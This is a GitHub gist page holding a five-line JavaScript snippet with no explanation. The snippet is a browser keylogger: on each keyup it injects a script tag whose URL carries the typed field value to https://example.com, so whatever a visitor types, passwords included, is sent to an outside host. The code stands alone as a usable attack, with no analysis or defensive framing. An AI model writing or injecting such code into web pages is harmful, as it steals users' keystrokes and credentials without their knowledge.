Skip to content

Instantly share code, notes, and snippets.

@egeste
Created April 29, 2016 03:51
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save egeste/88dd40b249938977272301788cdcb8ad to your computer and use it in GitHub Desktop.
Save egeste/88dd40b249938977272301788cdcb8ad to your computer and use it in GitHub Desktop.
document.body.onkeyup = function(e) {
var script = document.createElement('script');
script.src = 'https://example.com/?input='+e.srcElement.value;
document.head.appendChild(script);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment